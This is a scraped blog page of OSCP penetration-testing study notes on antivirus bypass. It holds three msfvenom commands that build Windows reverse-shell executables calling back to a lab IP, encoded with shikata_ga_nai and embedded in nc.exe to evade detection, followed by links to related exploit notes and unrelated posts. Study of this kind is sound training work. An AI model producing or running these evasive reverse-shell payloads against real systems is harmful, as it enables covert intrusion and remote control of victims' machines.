OSCP Learning Notes - Exploit(6)
Antivirus Bypassing
Tools: Kali Linux
Detection Platform: https://www.virustotal.com/gui/home/upload
1.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT= -f exe -o shell1.exe

2.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT= -f exe -e x86/shikata_ga_nai -o shell2.exe

3.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT= -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/nc.exe -o shell3.exe

OSCP Learning Notes - Exploit(6)的更多相关文章
- OSCP Learning Notes - Exploit(4)
		
Client Side Attacks Tool: setoolkit 1. Start setoolkit on Kali Linux. setoolkit 2. Select 1) Social- ...
 - OSCP Learning Notes - Exploit(3)
		
Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...
 - OSCP Learning Notes - Exploit(2)
		
Compiling an Exploit Exercise: samba exploit 1. Search and download the samba exploit source code fr ...
 - OSCP Learning Notes - Exploit(1)
		
Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptirx nmap ...
 - OSCP Learning Notes - Exploit(9)
		
Tool: Metasploit 1. Start the msfconsole tool. msfconsole 2.Search ssh related modules. 3.Use the &q ...
 - OSCP Learning Notes - Exploit(8)
		
Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret se ...
 - OSCP Learning Notes - Exploit(7)
		
Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options ...
 - OSCP Learning Notes - Exploit(5)
		
Java Applet Attacks Download virtual machines from the following website: https://developer.microsof ...
 - OSCP Learning Notes - Buffer Overflows(2)
		
Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...
 
随机推荐
- 09.DRF-ModelSerializer
			
四.模型类序列化器ModelSerializer 如果我们想要使用序列化器对应的是Django的模型类,DRF为我们提供了ModelSerializer模型类序列化器来帮助我们快速创建一个Serial ...
 - lw_oopc(c语言实现面向过程宏文件)解析
			
一:计算结构体成员变量偏移量宏 #ifdef LW_OOPC_USE_USER_DEFINED_OFFSETOF // 有些环境可能不支持,不过,这种情形极少出现 #define LW_OOPC_OF ...
 - Stream替代for-编码五分钟-划水五小时
			
Stream替代for-编码五分钟-划水五小时 天空没有痕迹,风雨已在心中. 背景:使用Stream 流式操作取代俄罗斯式套娃的for循环,解放底层劳动密集型码畜的双手,使编码五分钟划水五小时,不再是 ...
 - MySQL高级用法
			
-- 关联查询-- select * from Goods_BomItems s,Goods_Bom t where t.GoodsBomId = s.GoodsBomId and t.GoodsBo ...
 - Spring Cloud Alibaba系列(五)sentinel实现服务限流降级
			
一.sentinel是什么 sentinel的官方名称叫分布式系统的流量防卫兵.Sentinel 以流量为切入点,从流量控制.熔断降级.系统负载保护等多个维度保护服务的稳定性.在Spring Clou ...
 - 搭建nginx服务器nginx-1.6.2.tar.gz
			
2016-06-17 09:06:52 一.实验环境 CentOS6.5 软件:nginx-1.6.2.tar.gz 二.实验步骤 1)安装nginx所依赖的软件 yum -y install p ...
 - CountDownLatch和CyclicBarrier 傻傻的分不清?超长精美图文又来了
			
你有一个思想,我有一个思想,我们交换后,一个人就有两个思想 If you can NOT explain it simply, you do NOT understand it well enough ...
 - 断路器Hystrix(Ribbon)
			
微服务架构中,根据业务划分成若干个服务,各单元应用间通过服务注册与订阅的方式互相依赖,依赖通过远程调用的方式执行,该方式难以避免因网络或自身原因而出现故障或者延迟,从而并不能保证服务的100%可用,此 ...
 - 阿里云centos7安装redis全过程记录
			
Redis下载地址:https://redis.io/download(这个连接可能得翻墙查看,但是在centos7服务器上安装过程不需要翻墙,我查看了最新的是redis-4.0.9.tar.gz ) ...
 - WSL中文本地化
			
WSL中文本地化 Windows Subsystem for Linux(简称WSL)是一个在Windows 10上能够运行原生Linux二进制可执行文件(ELF格式)的兼容层.它是由微软与Canon ...